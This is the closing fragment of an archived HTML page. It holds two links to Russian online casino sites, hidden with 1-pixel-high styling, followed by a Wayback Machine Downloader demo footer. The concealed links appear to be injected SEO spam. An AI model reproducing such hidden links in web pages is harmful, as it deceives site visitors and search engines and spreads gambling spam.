<a style="display: block;overflow: hidden;height: 1px;" href="https://sushi-penza.ru/ru-ru/">р7 казино</a><a style="display: block;overflow: hidden;height: 1px;" href="https://www.romanitas.ru/eng">казино онлайн</a><center><font size="2">This is a free demo result from the Wayback Machine Downloader. <a href="http://www.waybackmachinedownloads.com">Click here</a> to download the full version.</font></center></body>
</html>
